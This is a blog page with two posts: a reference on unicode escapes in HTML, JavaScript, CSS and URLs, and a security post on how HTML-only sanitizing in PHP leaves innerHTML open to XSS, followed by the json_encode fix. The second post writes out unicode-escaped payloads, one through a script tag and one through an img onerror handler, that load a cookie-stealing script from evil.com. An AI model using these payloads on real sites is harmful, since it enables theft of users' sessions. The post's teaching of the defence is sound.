[philiptellis] /bb|[^b]{2}/
Never stop Grokking


Showing posts with label unicode. Show all posts
Showing posts with label unicode. Show all posts

Saturday, January 29, 2011

Printing unicode characters in web documents

I often have to look up reference sites to find out how to write a particular character in HTML, JavaScript or CSS when that character isn't on my keyboard. This post should save me some searching time in future.

To type a character that's not on your keyboard, you need its unicode codepoint in decimal or hexadecimal. In the examples below, HH means two hexadecimal digits, DD means two decimal digits, HHHH is four hexadecimal digits, and so on. DD+ means two or more decimal digits, HH+ means two or more hexadecimal digits.

HTML

To type out unicode characters in HTML, use one of the following:
  • &#DDD+;
  • &#xHHH+;
eg:
Ɖ == Ɖ
Ɖ == Ɖ
‡ == ‡

JavaScript

To type out unicode characters in JavaScript, use the following:
  • \uHHHH
eg:
 == \u2021

CSS

To print out a unicode character using CSS content, use the following:
  • \HH+
eg:
 == \2021
(Note: the CSS example that I've used here only works in browsers that support the :before pseudo class and the content rule, but in general you can use unicode characters anywhere in CSS.)

URL

URL context is different from HTML context, so I'm including it here.

To print a unicode character into a URL, you need to represent it in UTF-8, using the %HH notation for each byte.
eg:
‡ ==  %E2%80%A1
л ==  %D0%BB
' ==  %39
This is not something that you want to do by hand, so use a library to do the conversion. In JavaScript, you can use the encodeURI or encodeURIComponent functions to do this for you.

End notes

Use escape sequences only in two cases.
  1. Your editor or keyboard doesn't allow you to type the characters in directly.
  2. The characters could be misinterpreted as syntax, eg < or > in HTML.

References and Further Reading

  1. List of Unicode Characters on WikiPedia
  2. UTF-8 on WikiPedia
  3. Unicode and HTML on WikiPedia
  4. JavaScript Unicode Escape Sequences on Mozilla Developer Network
  5. Richard Ishida. 2005. Using Character Escapes in Markup and CSS in W3C Internationalisation.

Thursday, January 20, 2011

Sometimes you need to wash twice

When conversing across languages, informations is sometimes lost in translation.

The problem I'll talk about today deals with the different ways in which quotes can be represented in different contexts, in particular, when passing data across language boundaries. Let's look at some code.
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = "<?php echo $s; ?>";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
From the HTML perpective, this code appears clean. Data from the URL parameter s needs to be written out to HTML and we're applying a suitable filter to it to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.

Testing this code out with the usual suspects — <>&"' — shows that it's safe. You can neither insert HTML into the div, nor can you insert JavaScript by getting out of the quotes since all quotes in the input data are converted to &#34;

It seems that the worst that we can do here is to break the JavaScript by throwing a \ into the end of s. The output of our PHP becomes:
<script>
   var s = "...\";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The result is that our JavaScript terminates with an error after line 1, and that's the end of it... but maybe not.

The \ gives us a clue. In JavaScript, all characters are unicode, and we can represent any character by its unicode equivalent using the \u<codepoint>. This still doesn't help us get out of the quotes in JavaScript, but it does mess around with the innerHTML.

What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence, innerHTML is to HTML what eval() is to JavaScript and PHP — a bad idea.

We can now craft a string made completely using the unicode escape sequences for JavaScript. For example, \u003cscript+src\u003d\u0022http://evil.com/cookie-steal.js\u0022\u003e\u003c/script\u003e

When assigned to the innerHTML, it turns into the following HTML:
<script src="http://evil.com/cookie-steal.js"></script>
Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however execute inline events on elements added through innerHTML, so we do this instead:
\u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e, which translates to the following HTML (indented for readability):
<img src=blah
   onerror="s=document.createElement('script');
            s.src='http://...';
            document.body.appendChild(s);">
The JavaScript fires in most cases. To get it to fire in all cases, you also need to attach to the onload event.

So, what's the fix here?

To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = <?php echo json_encode($s); ?>

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The json_encode function returns a quoted JavaScript string. It correctly escapes all characters within that string that are special to JavaScript, so in our case, \u00xx turns into \\u00xx. Note that addslashes is insufficient as it does not escape newline characters which are valid inside PHP strings.

Two things to learn from this:
  1. When passing untrusted data across language boundaries, you may need to sanitize it multiple times
  2. innerHTML is the eval of HTML

...===...